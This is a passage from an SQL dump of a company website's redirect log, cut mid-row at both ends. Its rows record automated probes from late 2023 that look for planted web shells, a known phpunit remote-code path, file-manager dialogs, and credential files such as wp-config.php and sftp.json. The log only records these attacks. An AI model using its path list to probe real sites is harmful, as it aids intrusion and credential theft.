00:00:00',301),(33457,'https://3s-technologies.com.tr/tr/wp-content/themes/signify/firkon.php',NULL,'','',1,0,'2023-10-20 09:11:33','0000-00-00 00:00:00',301),(33458,'https://3s-technologies.com.tr/tr/wp-content/themes/mero-megazines/ws.php',NULL,'','',1,0,'2023-10-20 09:11:34','0000-00-00 00:00:00',301),(33459,'https://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/index.php',NULL,'','',3,0,'2023-10-20 09:11:35','0000-00-00 00:00:00',301),(33460,'https://3s-technologies.com.tr/tr/.well-known/acme-challenge/license.php',NULL,'','',1,0,'2023-10-20 09:11:36','0000-00-00 00:00:00',301),(33461,'https://3s-technologies.com.tr/tr/wp-content/plugins/envato-market/inc/class-envato-market-api.php',NULL,'','',1,0,'2023-10-20 09:11:37','0000-00-00 00:00:00',301),(33462,'https://3s-technologies.com.tr/tr/.well-known/acme-challenge/index.php',NULL,'','',3,0,'2023-10-20 09:11:38','0000-00-00 00:00:00',301),(33463,'https://3s-technologies.com.tr/tr/wp-includes/requests/text/index.php',NULL,'','',1,0,'2023-10-20 09:11:38','0000-00-00 00:00:00',301),(33464,'https://3s-technologies.com.tr/tr/wp-content/plugins/classic-editor/wp-login.php',NULL,'','',3,0,'2023-10-20 09:11:39','0000-00-00 00:00:00',301),(33465,'https://3s-technologies.com.tr/tr/radio.php',NULL,'','',3,0,'2023-10-20 09:11:40','0000-00-00 00:00:00',301),(33466,'https://3s-technologies.com.tr/tr/wp-content/plugins/fix/up.php',NULL,'','',2,0,'2023-10-20 09:11:41','0000-00-00 00:00:00',301),(33467,'https://3s-technologies.com.tr/tr/cjfuns.php',NULL,'','',3,0,'2023-10-20 09:11:42','0000-00-00 00:00:00',301),(33468,'https://3s-technologies.com.tr/tr/1975.php?shell=1975',NULL,'','',1,0,'2023-10-20 09:11:43','0000-00-00 00:00:00',301),(33469,'https://3s-technologies.com.tr/tr/shell20211028.php',NULL,'','',3,0,'2023-10-20 09:11:44','0000-00-00 00:00:00',301),(33470,'https://3s-technologies.com.tr/tr/wp-content/plugins/press/wp-class.php',NULL,'','',3,0,'2023-10-20 09:11:45','0000-00-00 00:00:00',301),(33471,'http://3s-technologies.com.tr/en/themes.php',NULL,'www.google.com','',119,0,'2023-10-20 09:49:13','0000-00-00 00:00:00',301),(33472,'https://3s-technologies.com.tr/en/wp-json/tdw',NULL,'https://3s-technologies.com.tr/wp-json/tdw/','',1,0,'2023-10-20 17:55:39','0000-00-00 00:00:00',301),(33473,'http://www.3s-technologies.com.tr/en/wp-content/themes/include.php',NULL,'www.google.com','',2,0,'2023-10-21 07:00:54','0000-00-00 00:00:00',301),(33474,'http://www.3s-technologies.com.tr/en/wp-includes/widgets/include.php',NULL,'www.google.com','',2,0,'2023-10-21 07:00:58','0000-00-00 00:00:00',301),(33475,'http://www.3s-technologies.com.tr/en/wp-class.php',NULL,'www.google.com','',1,0,'2023-10-21 07:01:13','0000-00-00 00:00:00',301),(33476,'http://www.3s-technologies.com.tr/en/wp-head.php',NULL,'www.google.com','',1,0,'2023-10-21 07:01:21','0000-00-00 00:00:00',301),(33477,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/up.php',NULL,'','',168,0,'2023-10-21 12:35:35','0000-00-00 00:00:00',301),(33478,'http://3s-technologies.com.tr/tr/wp-content/plugins/royal-elementor-addons/assets/js/modal-popups.min.js',NULL,'','',6,0,'2023-10-23 04:09:25','0000-00-00 00:00:00',301),(33479,'https://www.3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',5,0,'2023-10-23 16:54:19','0000-00-00 00:00:00',301),(33480,'http://3s-technologies.com.tr/tr/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'','',1,0,'2023-10-24 18:02:51','0000-00-00 00:00:00',301),(33481,'http://3s-technologies.com.tr/tr/wp-content/plugins/royal-elementor-addons/assets/js/frontend.js',NULL,'','',1,0,'2023-10-24 18:02:51','0000-00-00 00:00:00',301),(33482,'http://3s-technologies.com.tr/en/chosen.php?p=',NULL,'www.google.com','',1,0,'2023-10-30 09:21:10','0000-00-00 00:00:00',301),(33483,'https://3s-technologies.com.tr/en/woh.php',NULL,'www.google.com','',1,0,'2023-10-30 09:21:11','0000-00-00 00:00:00',301),(33484,'https://3s-technologies.com.tr/en/wp-admin/includes/themes.php',NULL,'www.google.com','',1,0,'2023-10-30 09:21:17','0000-00-00 00:00:00',301),(33485,'http://3s-technologies.com.tr/tr/wp-content/upgrade',NULL,'','',66,0,'2023-11-01 19:45:07','0000-00-00 00:00:00',301),(33486,'http://3s-technologies.com.tr/en/wp-admin/network/upfile.php',NULL,'www.google.com','',1,0,'2023-11-01 22:47:15','0000-00-00 00:00:00',301),(33487,'https://3s-technologies.com.tr/en/wp-admin/maint/upfile.php',NULL,'www.google.com','',1,0,'2023-11-01 22:47:15','0000-00-00 00:00:00',301),(33488,'http://3s-technologies.com.tr/tr/core',NULL,'','',1,0,'2023-11-04 00:26:54','0000-00-00 00:00:00',301),(33489,'http://3s-technologies.com.tr/tr/media/upload/filemanager/dialog.php',NULL,'http://3s-technologies.com.tr/media/upload/filemanager/dialog.php','',2,0,'2023-11-04 06:32:32','0000-00-00 00:00:00',301),(33490,'http://3s-technologies.com.tr/tr/plugins/filemanager/dialog.php',NULL,'http://3s-technologies.com.tr/plugins/filemanager/dialog.php','',2,0,'2023-11-04 07:03:16','0000-00-00 00:00:00',301),(33491,'http://3s-technologies.com.tr/tr/plugins/tinymce/plugins/filemanager/dialog.php',NULL,'http://3s-technologies.com.tr/plugins/tinymce/plugins/filemanager/dialog.php','',2,0,'2023-11-04 07:35:27','0000-00-00 00:00:00',301),(33492,'http://3s-technologies.com.tr/tr/public/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php',NULL,'http://3s-technologies.com.tr/public/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php','',1,0,'2023-11-04 08:38:15','0000-00-00 00:00:00',301),(33493,'http://3s-technologies.com.tr/tr/admin/filemanager/filemanager/dialog.php',NULL,'http://3s-technologies.com.tr/admin/filemanager/filemanager/dialog.php','',1,0,'2023-11-04 10:22:00','0000-00-00 00:00:00',301),(33494,'http://3s-technologies.com.tr/tr/media/upload/filemanager/filemanager/dialog.php',NULL,'http://3s-technologies.com.tr/media/upload/filemanager/filemanager/dialog.php','',1,0,'2023-11-04 12:33:03','0000-00-00 00:00:00',301),(33495,'https://3s-technologies.com.tr/en/cjfuns.php',NULL,'www.google.com','',1,0,'2023-11-08 15:24:07','0000-00-00 00:00:00',301),(33496,'http://3s-technologies.com.tr/tr/accesson.php',NULL,'','',4,0,'2023-11-12 17:10:02','0000-00-00 00:00:00',301),(33497,'http://3s-technologies.com.tr/tr/assets/images/accesson.php',NULL,'','',6,0,'2023-11-12 17:10:04','0000-00-00 00:00:00',301),(33498,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/accesson.php',NULL,'','',4,0,'2023-11-12 17:10:04','0000-00-00 00:00:00',301),(33499,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/include.php',NULL,'','',2,0,'2023-11-15 23:39:17','0000-00-00 00:00:00',301),(33500,'https://3s-technologies.com.tr/tr/a',NULL,'https://3s-technologies.com.tr/a','',17,0,'2023-11-16 07:18:21','0000-00-00 00:00:00',301),(33501,'http://3s-technologies.com.tr/tr//wp-content/plugins/wp-fastest-cache/readme.txt',NULL,'','',1,0,'2023-11-16 18:46:34','0000-00-00 00:00:00',301),(33502,'https://www.3s-technologies.com.tr/tr/wp-config.php',NULL,'','',4,0,'2023-11-17 08:27:25','0000-00-00 00:00:00',301),(33503,'http://www.3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/img/index.php?p=',NULL,'www.google.com','',8,0,'2023-11-20 16:09:44','0000-00-00 00:00:00',301),(33504,'http://3s-technologies.com.tr/tr/chosen.php?p=',NULL,'','',2,0,'2023-11-21 04:30:52','0000-00-00 00:00:00',301),(33505,'http://www.3s-technologies.com.tr/en/ms.php',NULL,'www.google.com','',2,0,'2023-11-22 10:52:29','0000-00-00 00:00:00',301),(33506,'http://www.3s-technologies.com.tr/en/wp-admin/about.php',NULL,'www.google.com','',2,0,'2023-11-22 10:52:31','0000-00-00 00:00:00',301),(33507,'http://www.3s-technologies.com.tr/en/wp-content/admin.php',NULL,'www.google.com','',2,0,'2023-11-22 10:52:34','0000-00-00 00:00:00',301),(33508,'http://www.3s-technologies.com.tr/tr/.vscode/sftp.json',NULL,'','',5,0,'2023-11-23 09:44:48','0000-00-00 00:00:00',301),(33509,'http://www.3s-technologies.com.tr/tr/sftp.json',NULL,'','',2,0,'2023-11-23 09:44:50','0000-00-00 00:00:00',301),(33510,'http://3s-technologies.com.tr/tr/sftp.json',NULL,'','',16,0,'2023-11-23 09:44:56','0000-00-00 00:00:00',301),(33511,'https://3s-technologies.com.tr/tr/lkmdnepenn',NULL,'','',1,0,'2023-11-27 11:40:06','0000-00-00 00:00:00',301),(33512,'https://3s-technologies.com.tr/tr/images/ddm/le40v.png&quot',NULL,'https://3s-technologies.com.tr/images/ddm/LE40V.png&quot','',2,0,'2023-11-27 18:52:41','0000-00-00 00:00:00',301),(33513,'http://3s-technologies.com.tr/tr/sellerolux_407775878.php',NULL,'http://3s-technologies.com.tr/sellerolux_407775878.php','',1,0,'2023-11-28 15:52:12','0000-00-00 00:00:00',301),(33514,'http://3s-technologies.com.tr/tr/wp-settings.php',NULL,'http://3s-technologies.com.tr/wp-settings.php','',21,0,'2023-11-28 16:07:48','0000-00-00 00:00:00',301),(33515,'http://3s-technologies.com.tr/tr/fox55.php',NULL,'http://3s-technologies.com.tr/fox55.php','',1,0,'2023-11-28 16:23:03','0000-00-00 00:00:00',301),(33516,'http://3s-technologies.com.tr/tr/666.php',NULL,'http://3s-technologies.com.tr/666.php','',109,0,'2023-11-28 16:53:28','0000-00-00 00:00:00',301),(33517,'http://3s-technologies.com.tr/tr/wp-item.php.suspected',NULL,'http://3s-technologies.com.tr/wp-item.php.suspected','',1,0,'2023-11-28 16:53:44','0000-00-00 00:00:00',301),(33518,'http://3s-technologies.com.tr/tr/king.php',NULL,'http://3s-technologies.com.tr/king.php','',1,0,'2023-11-28 17:08:27','0000-00-00 00:00:00',301),(33519,'http://3s-technologies.com.tr/tr/kerwqh.php',NULL,'http://3s-technologies.com.tr/kErwQh.php','',2,0,'2023-11-28 17:20:22','0000-00-00 00:00:00',301),(33520,'http://3s-technologies.com.tr/tr/exp.php',NULL,'http://3s-technologies.com.tr/exp.php','',1,0,'2023-11-28 17:23:23','0000-00-00 00:00:00',301),(33521,'http://3s-technologies.com.tr/tr/nbfqt.php',NULL,'http://3s-technologies.com.tr/nbfqt.php','',1,0,'2023-11-28 17:23:30','0000-00-00 00:00:00',301),(33522,'http://3s-technologies.com.tr/tr/ofyxbqefcg.php',NULL,'http://3s-technologies.com.tr/ofyxbqefcg.php','',1,0,'2023-11-28 17:24:14','0000-00-00 00:00:00',301),(33523,'http://3s-technologies.com.tr/tr/nhazcudrgm.php',NULL,'http://3s-technologies.com.tr/nHAzcuDRgm.php','',1,0,'2023-11-28 17:53:27','0000-00-00 00:00:00',301),(33524,'http://3s-technologies.com.tr/tr/zrqdpt.php',NULL,'http://3s-technologies.com.tr/zrqdpt.php','',1,0,'2023-11-28 18:26:49','0000-00-00 00:00:00',301),(33525,'http://3s-technologies.com.tr/tr/marjun.php',NULL,'http://3s-technologies.com.tr/marjun.php','',2,0,'2023-11-28 18:37:28','0000-00-00 00:00:00',301),(33526,'http://3s-technologies.com.tr/tr/licesne.php',NULL,'http://3s-technologies.com.tr/licesne.php','',2,0,'2023-11-28 19:39:03','0000-00-00 00:00:00',301),(33527,'http://3s-technologies.com.tr/tr/djrauiuxny.php',NULL,'http://3s-technologies.com.tr/DjRauiUXny.php','',1,0,'2023-11-28 19:59:08','0000-00-00 00:00:00',301),(33528,'http://3s-technologies.com.tr/tr/coexistsu.php',NULL,'http://3s-technologies.com.tr/coexistsu.php','',2,0,'2023-11-28 20:08:02','0000-00-00 00:00:00',301),(33529,'http://3s-technologies.com.tr/tr/z1.php',NULL,'http://3s-technologies.com.tr/z1.php','',2,0,'2023-11-28 20:10:12','0000-00-00 00:00:00',301),(33530,'http://3s-technologies.com.tr/tr/portals.php',NULL,'http://3s-technologies.com.tr/portals.php','',1,0,'2023-11-28 20:38:18','0000-00-00 00:00:00',301),(33531,'http://3s-technologies.com.tr/tr/nclea.php',NULL,'http://3s-technologies.com.tr/nclea.php','',1,0,'2023-11-28 20:41:10','0000-00-00 00:00:00',301),(33532,'http://3s-technologies.com.tr/tr/gpgbcnbgpv.php',NULL,'http://3s-technologies.com.tr/gpgbcnbgpv.php','',1,0,'2023-11-28 20:45:40','0000-00-00 00:00:00',301),(33533,'http://3s-technologies.com.tr/tr/lvquntaalc.php',NULL,'http://3s-technologies.com.tr/lVquNtaalc.php','',1,0,'2023-11-28 20:53:34','0000-00-00 00:00:00',301),(33534,'http://3s-technologies.com.tr/tr/wp-forms-ajax.php.suspected',NULL,'http://3s-technologies.com.tr/wp-forms-ajax.php.suspected','',1,0,'2023-11-28 20:56:25','0000-00-00 00:00:00',301),(33535,'http://3s-technologies.com.tr/tr/old_index.php',NULL,'http://3s-technologies.com.tr/old_index.php','',1,0,'2023-11-28 21:17:03','0000-00-00 00:00:00',301),(33536,'http://3s-technologies.com.tr/tr/wp-menus.php.suspected',NULL,'http://3s-technologies.com.tr/wp-menus.php.suspected','',2,0,'2023-11-28 21:17:04','0000-00-00 00:00:00',301),(33537,'http://3s-technologies.com.tr/tr/wp_mna.php',NULL,'http://3s-technologies.com.tr/wp_mna.php','',6,0,'2023-11-28 21:50:30','0000-00-00 00:00:00',301),(33538,'http://3s-technologies.com.tr/tr/gaegesfes.php',NULL,'http://3s-technologies.com.tr/gaegesfes.php','',1,0,'2023-11-28 21:56:59','0000-00-00 00:00:00',301),(33539,'http://3s-technologies.com.tr/tr/ae.php',NULL,'http://3s-technologies.com.tr/ae.php','',59,0,'2023-11-28 22:18:44','0000-00-00 00:00:00',301),(33540,'http://3s-technologies.com.tr/tr/gwfefygrtk.php',NULL,'http://3s-technologies.com.tr/gwFefygrTK.php','',1,0,'2023-11-28 22:35:25','0000-00-00 00:00:00',301),(33541,'http://3s-technologies.com.tr/tr/link.php',NULL,'http://3s-technologies.com.tr/link.php','',181,0,'2023-11-28 23:09:10','0000-00-00 00:00:00',301),(33542,'http://3s-technologies.com.tr/tr/aojor.php',NULL,'http://3s-technologies.com.tr/aojor.php','',2,0,'2023-11-28 23:09:17','0000-00-00 00:00:00',301),(33543,'http://3s-technologies.com.tr/tr/wp-plain.php',NULL,'http://3s-technologies.com.tr/wp-plain.php','',2,0,'2023-11-28 23:24:21','0000-00-00 00:00:00',301),(33544,'http://3s-technologies.com.tr/tr/script.php.suspected',NULL,'http://3s-technologies.com.tr/script.php.suspected','',2,0,'2023-11-28 23:26:02','0000-00-00 00:00:00',301),(33545,'http://3s-technologies.com.tr/tr/names.php',NULL,'http://3s-technologies.com.tr/names.php','',1,0,'2023-11-28 23:41:36','0000-00-00 00:00:00',301),(33546,'http://3s-technologies.com.tr/tr/mw2cdg1vrai.php',NULL,'http://3s-technologies.com.tr/MW2cdg1VRaI.php','',1,0,'2023-11-29 00:35:26','0000-00-00 00:00:00',301),(33547,'http://3s-technologies.com.tr/tr/vabba.php',NULL,'http://3s-technologies.com.tr/vabba.php','',1,0,'2023-11-29 00:35:44','0000-00-00 00:00:00',301),(33548,'http://3s-technologies.com.tr/tr/wshell.php',NULL,'http://3s-technologies.com.tr/wshell.php','',1,0,'2023-11-29 00:37:32','0000-00-00 00:00:00',301),(33549,'http://3s-technologies.com.tr/tr/ganteng.php',NULL,'http://3s-technologies.com.tr/Ganteng.php','',1,0,'2023-11-29 00:42:11','0000-00-00 00:00:00',301),(33550,'http://3s-technologies.com.tr/tr/fox-index.php',NULL,'http://3s-technologies.com.tr/fox-index.php','',1,0,'2023-11-29 00:43:06','0000-00-00 00:00:00',301),(33551,'http://3s-technologies.com.tr/tr/or.php',NULL,'http://3s-technologies.com.tr/or.php','',1,0,'2023-11-29 00:44:49','0000-00-00 00:00:00',301),(33552,'http://3s-technologies.com.tr/tr/llmotj.php',NULL,'http://3s-technologies.com.tr/llmotj.php','',1,0,'2023-11-29 00:51:22','0000-00-00 00:00:00',301),(33553,'http://3s-technologies.com.tr/tr/snpdoodlox.php',NULL,'http://3s-technologies.com.tr/sNpDooDlox.php','',1,0,'2023-11-29 00:58:21','0000-00-00 00:00:00',301),(33554,'http://3s-technologies.com.tr/tr/hfgsgedsfss.php',NULL,'http://3s-technologies.com.tr/hfgsgedsfss.php','',1,0,'2023-11-29 01:15:22','0000-00-00 00:00:00',301),(33555,'http://3s-technologies.com.tr/tr/wp-sgin.php.suspected',NULL,'http://3s-technologies.com.tr/wp-sgin.php.suspected','',1,0,'2023-11-29 01:15:35','0000-00-00 00:00:00',301),(33556,'http://3s-technologies.com.tr/tr/ahdryiwalt.php',NULL,'http://3s-technologies.com.tr/AhDryIWalT.php','',2,0,'2023-11-29 01:19:06','0000-00-00 00:00:00',301),(33557,'http://3s-technologies.com.tr/tr/cy.php',NULL,'http://3s-technologies.com.tr/cy.php','',1,0,'2023-11-29 01:23:41','0000-00-00 00:00:00',301),(33558,'http://3s-technologies.com.tr/tr/feser.php',NULL,'http://3s-technologies.com.tr/feser.php','',1,0,'2023-11-29 01:23:48','0000-00-00 00:00:00',301),(33559,'http://3s-technologies.com.tr/tr/.shell.php',NULL,'http://3s-technologies.com.tr/.shell.php','',1,0,'2023-11-29 01:32:55','0000-00-00 00:00:00',301),(33560,'http://3s-technologies.com.tr/tr/toor2.php',NULL,'http://3s-technologies.com.tr/toor2.php','',1,0,'2023-11-29 01:40:13','0000-00-00 00:00:00',301),(33561,'http://3s-technologies.com.tr/tr/wp_mnax.php',NULL,'http://3s-technologies.com.tr/wp_mnax.php','',1,0,'2023-11-29 01:40:36','0000-00-00 00:00:00',301),(33562,'http://3s-technologies.com.tr/tr/blue.php',NULL,'http://3s-technologies.com.tr/blue.php','',7,0,'2023-11-29 02:13:09','0000-00-00 00:00:00',301),(33563,'http://3s-technologies.com.tr/tr/evwmla.php',NULL,'http://3s-technologies.com.tr/evwmla.php','',2,0,'2023-11-29 02:13:33','0000-00-00 00:00:00',301),(33564,'http://3s-technologies.com.tr/tr/063a2451b8.php',NULL,'http://3s-technologies.com.tr/063a2451b8.php','',1,0,'2023-11-29 02:15:17','0000-00-00 00:00:00',301),(33565,'http://3s-technologies.com.tr/tr/siteindex.php',NULL,'http://3s-technologies.com.tr/siteindex.php','',2,0,'2023-11-29 02:22:34','0000-00-00 00:00:00',301),(33566,'http://3s-technologies.com.tr/tr/oplame.php',NULL,'http://3s-technologies.com.tr/oplame.php','',1,0,'2023-11-29 02:34:12','0000-00-00 00:00:00',301),(33567,'http://3s-technologies.com.tr/tr/byte.php',NULL,'http://3s-technologies.com.tr/byte.php','',2,0,'2023-11-29 02:59:31','0000-00-00 00:00:00',301),(33568,'http://3s-technologies.com.tr/tr/luycy.php.suspected',NULL,'http://3s-technologies.com.tr/luycy.php.suspected','',1,0,'2023-11-29 03:02:20','0000-00-00 00:00:00',301),(33569,'http://3s-technologies.com.tr/tr/wp-custm.php',NULL,'http://3s-technologies.com.tr/wp-custm.php','',1,0,'2023-11-29 03:06:34','0000-00-00 00:00:00',301),(33570,'http://3s-technologies.com.tr/tr/zewuw0.php',NULL,'http://3s-technologies.com.tr/zewuw0.php','',1,0,'2023-11-29 03:16:45','0000-00-00 00:00:00',301),(33571,'http://3s-technologies.com.tr/tr/cim.php.suspected',NULL,'http://3s-technologies.com.tr/cim.php.suspected','',2,0,'2023-11-29 03:34:57','0000-00-00 00:00:00',301),(33572,'http://3s-technologies.com.tr/tr/adriv..php',NULL,'http://3s-technologies.com.tr/adriv..php','',2,0,'2023-11-29 03:51:44','0000-00-00 00:00:00',301),(33573,'http://3s-technologies.com.tr/tr/igzqy.php',NULL,'http://3s-technologies.com.tr/igzqy.php','',1,0,'2023-11-29 03:57:40','0000-00-00 00:00:00',301),(33574,'http://3s-technologies.com.tr/tr/docindex.php.suspected',NULL,'http://3s-technologies.com.tr/docindex.php.suspected','',1,0,'2023-11-29 04:09:07','0000-00-00 00:00:00',301),(33575,'http://3s-technologies.com.tr/tr/hours.php.suspected',NULL,'http://3s-technologies.com.tr/hours.php.suspected','',1,0,'2023-11-29 04:14:02','0000-00-00 00:00:00',301),(33576,'http://3s-technologies.com.tr/tr/tracker.php',NULL,'http://3s-technologies.com.tr/tracker.php','',4,0,'2023-11-29 04:14:04','0000-00-00 00:00:00',301),(33577,'http://3s-technologies.com.tr/tr/includes.php.suspected',NULL,'http://3s-technologies.com.tr/includes.php.suspected','',1,0,'2023-11-29 04:43:30','0000-00-00 00:00:00',301),(33578,'http://3s-technologies.com.tr/tr/uploads.php',NULL,'http://3s-technologies.com.tr/uploads.php','',7,0,'2023-11-29 05:19:05','0000-00-00 00:00:00',301),(33579,'http://3s-technologies.com.tr/tr/bsn.php',NULL,'http://3s-technologies.com.tr/bsn.php','',1,0,'2023-11-29 05:20:42','0000-00-00 00:00:00',301),(33580,'http://3s-technologies.com.tr/tr/c4b46c27a8.php',NULL,'http://3s-technologies.com.tr/c4b46c27a8.php','',2,0,'2023-11-29 05:23:06','0000-00-00 00:00:00',301),(33581,'http://3s-technologies.com.tr/tr/qumengesl.php',NULL,'http://3s-technologies.com.tr/qumengesl.php','',1,0,'2023-11-29 05:35:17','0000-00-00 00:00:00',301),(33582,'http://3s-technologies.com.tr/tr/adriv.php',NULL,'http://3s-technologies.com.tr/adriv.php','',2,0,'2023-11-29 05:37:21','0000-00-00 00:00:00',301),(33583,'http://3s-technologies.com.tr/tr/index(old).php',NULL,'http://3s-technologies.com.tr/index(old).php','',1,0,'2023-11-29 05:39:25','0000-00-00 00:00:00',301),(33584,'http://3s-technologies.com.tr/tr/wp-option.php',NULL,'http://3s-technologies.com.tr/wp-option.php','',1,0,'2023-11-29 05:39:29','0000-00-00 00:00:00',301),(33585,'http://3s-technologies.com.tr/tr/wp-sid.php',NULL,'http://3s-technologies.com.tr/wp-sid.php','',3,0,'2023-11-29 05:42:35','0000-00-00 00:00:00',301),(33586,'http://3s-technologies.com.tr/tr/mhbgf.php.suspected',NULL,'http://3s-technologies.com.tr/Mhbgf.php.suspected','',1,0,'2023-11-29 05:59:31','0000-00-00 00:00:00',301),(33587,'http://3s-technologies.com.tr/tr/fztuxdanje.php',NULL,'http://3s-technologies.com.tr/fztuxdanje.php','',1,0,'2023-11-29 06:16:09','0000-00-00 00:00:00',301),(33588,'http://3s-technologies.com.tr/tr/rex.php',NULL,'http://3s-technologies.com.tr/rex.php','',5,0,'2023-11-29 06:20:04','0000-00-00 00:00:00',301),(33589,'http://3s-technologies.com.tr/tr/resource.php',NULL,'http://3s-technologies.com.tr/resource.php','',2,0,'2023-11-29 06:28:43','0000-00-00 00:00:00',301),(33590,'http://3s-technologies.com.tr/tr/wp-cokiee.php',NULL,'http://3s-technologies.com.tr/wp-cokiee.php','',3,0,'2023-11-29 06:28:48','0000-00-00 00:00:00',301),(33591,'http://3s-technologies.com.tr/tr/iindex.php',NULL,'http://3s-technologies.com.tr/Iindex.php','',1,0,'2023-11-29 06:44:33','0000-00-00 00:00:00',301),(33592,'http://3s-technologies.com.tr/tr/kszsvvwayo.php',NULL,'http://3s-technologies.com.tr/KSZsVvwAYo.php','',1,0,'2023-11-29 06:44:43','0000-00-00 00:00:00',301),(33593,'http://3s-technologies.com.tr/tr/class-wp-feed.php',NULL,'http://3s-technologies.com.tr/class-wp-feed.php','',1,0,'2023-11-29 06:45:53','0000-00-00 00:00:00',301),(33594,'http://3s-technologies.com.tr/tr/mussa.php',NULL,'http://3s-technologies.com.tr/mussa.php','',2,0,'2023-11-29 06:46:09','0000-00-00 00:00:00',301),(33595,'http://3s-technologies.com.tr/tr/int.php',NULL,'http://3s-technologies.com.tr/int.php','',3,0,'2023-11-29 06:53:53','0000-00-00 00:00:00',301),(33596,'http://3s-technologies.com.tr/tr/sim5.php.suspected',NULL,'http://3s-technologies.com.tr/sim5.php.suspected','',1,0,'2023-11-29 07:01:09','0000-00-00 00:00:00',301),(33597,'http://3s-technologies.com.tr/tr/wp-crone.php',NULL,'http://3s-technologies.com.tr/wp-crone.php','',3,0,'2023-11-29 07:10:05','0000-00-00 00:00:00',301),(33598,'http://3s-technologies.com.tr/tr/jmh.php',NULL,'http://3s-technologies.com.tr/jmh.php','',1,0,'2023-11-29 07:17:12','0000-00-00 00:00:00',301),(33599,'http://3s-technologies.com.tr/tr/category.php',NULL,'http://3s-technologies.com.tr/category.php','',1,0,'2023-11-29 07:18:21','0000-00-00 00:00:00',301),(33600,'http://3s-technologies.com.tr/tr/qyvfbcah.php',NULL,'http://3s-technologies.com.tr/qyvfbcah.php','',1,0,'2023-11-29 07:27:17','0000-00-00 00:00:00',301),(33601,'http://3s-technologies.com.tr/tr/a1a1a1a.php',NULL,'http://3s-technologies.com.tr/a1a1a1a.php','',1,0,'2023-11-29 07:40:09','0000-00-00 00:00:00',301),(33602,'http://3s-technologies.com.tr/tr/ss.php',NULL,'http://3s-technologies.com.tr/ss.php','',94,0,'2023-11-29 07:49:06','0000-00-00 00:00:00',301),(33603,'http://3s-technologies.com.tr/tr/nour14789.php',NULL,'http://3s-technologies.com.tr/nour14789.php','',1,0,'2023-11-29 07:51:04','0000-00-00 00:00:00',301),(33604,'http://3s-technologies.com.tr/tr/zbigrjvrly.php',NULL,'http://3s-technologies.com.tr/ZBiGRJVRLY.php','',1,0,'2023-11-29 07:57:41','0000-00-00 00:00:00',301),(33605,'http://3s-technologies.com.tr/tr/haders.php',NULL,'http://3s-technologies.com.tr/haders.php','',2,0,'2023-11-29 08:08:05','0000-00-00 00:00:00',301),(33606,'http://3s-technologies.com.tr/tr/bala.php.suspected',NULL,'http://3s-technologies.com.tr/bala.php.suspected','',2,0,'2023-11-29 08:08:06','0000-00-00 00:00:00',301),(33607,'http://3s-technologies.com.tr/tr/loi.php',NULL,'http://3s-technologies.com.tr/loi.php','',3,0,'2023-11-29 08:12:17','0000-00-00 00:00:00',301),(33608,'http://3s-technologies.com.tr/tr/licance.php',NULL,'http://3s-technologies.com.tr/licance.php','',1,0,'2023-11-29 08:31:43','0000-00-00 00:00:00',301),(33609,'http://3s-technologies.com.tr/tr/tplpage.php|root',NULL,'http://3s-technologies.com.tr/tplpage.php|root','',1,0,'2023-11-29 08:31:44','0000-00-00 00:00:00',301),(33610,'http://3s-technologies.com.tr/tr/my2.php',NULL,'http://3s-technologies.com.tr/my2.php','',1,0,'2023-11-29 08:32:27','0000-00-00 00:00:00',301),(33611,'http://3s-technologies.com.tr/tr/ndnifcyahw.php',NULL,'http://3s-technologies.com.tr/nDnIfcyAhW.php','',1,0,'2023-11-29 08:42:09','0000-00-00 00:00:00',301),(33612,'http://3s-technologies.com.tr/tr/wp-admix.php',NULL,'http://3s-technologies.com.tr/wp-admix.php','',1,0,'2023-11-29 08:42:11','0000-00-00 00:00:00',301),(33613,'http://3s-technologies.com.tr/tr/jack.php',NULL,'http://3s-technologies.com.tr/jack.php','',3,0,'2023-11-29 08:46:22','0000-00-00 00:00:00',301),(33614,'http://3s-technologies.com.tr/tr/iikpyrazlp.php',NULL,'http://3s-technologies.com.tr/iikpyrazlp.php','',1,0,'2023-11-29 09:03:07','0000-00-00 00:00:00',301),(33615,'http://3s-technologies.com.tr/tr/rcoiqa.php',NULL,'http://3s-technologies.com.tr/rcoiqa.php','',2,0,'2023-11-29 09:05:24','0000-00-00 00:00:00',301),(33616,'http://3s-technologies.com.tr/tr/word-defence-waf.php.suspected',NULL,'http://3s-technologies.com.tr/word-defence-waf.php.suspected','',1,0,'2023-11-29 09:17:29','0000-00-00 00:00:00',301),(33617,'http://3s-technologies.com.tr/tr/wp-clears.php',NULL,'http://3s-technologies.com.tr/wp-clears.php','',1,0,'2023-11-29 09:19:36','0000-00-00 00:00:00',301),(33618,'http://3s-technologies.com.tr/tr/yyarfjhwkv.php',NULL,'http://3s-technologies.com.tr/YyarFJhwKv.php','',4,0,'2023-11-29 09:29:36','0000-00-00 00:00:00',301),(33619,'http://3s-technologies.com.tr/tr/sim1.php',NULL,'http://3s-technologies.com.tr/sim1.php','',1,0,'2023-11-29 10:02:07','0000-00-00 00:00:00',301),(33620,'http://3s-technologies.com.tr/tr/odpas.php',NULL,'http://3s-technologies.com.tr/odpas.php','',1,0,'2023-11-29 10:09:31','0000-00-00 00:00:00',301),(33621,'http://3s-technologies.com.tr/tr/xwvemtxfua.php',NULL,'http://3s-technologies.com.tr/xwvemtxfua.php','',3,0,'2023-11-29 10:15:36','0000-00-00 00:00:00',301),(33622,'http://3s-technologies.com.tr/tr/xshell.php',NULL,'http://3s-technologies.com.tr/Xshell.php','',2,0,'2023-11-29 10:23:08','0000-00-00 00:00:00',301),(33623,'http://3s-technologies.com.tr/tr/ol.php',NULL,'http://3s-technologies.com.tr/ol.php','',83,0,'2023-11-29 10:23:09','0000-00-00 00:00:00',301),(33624,'http://3s-technologies.com.tr/tr/ocsgewfss.php',NULL,'http://3s-technologies.com.tr/ocsgewfss.php','',1,0,'2023-11-29 10:26:39','0000-00-00 00:00:00',301),(33625,'http://3s-technologies.com.tr/tr/jss.php.suspected',NULL,'http://3s-technologies.com.tr/jss.php.suspected','',1,0,'2023-11-29 10:26:40','0000-00-00 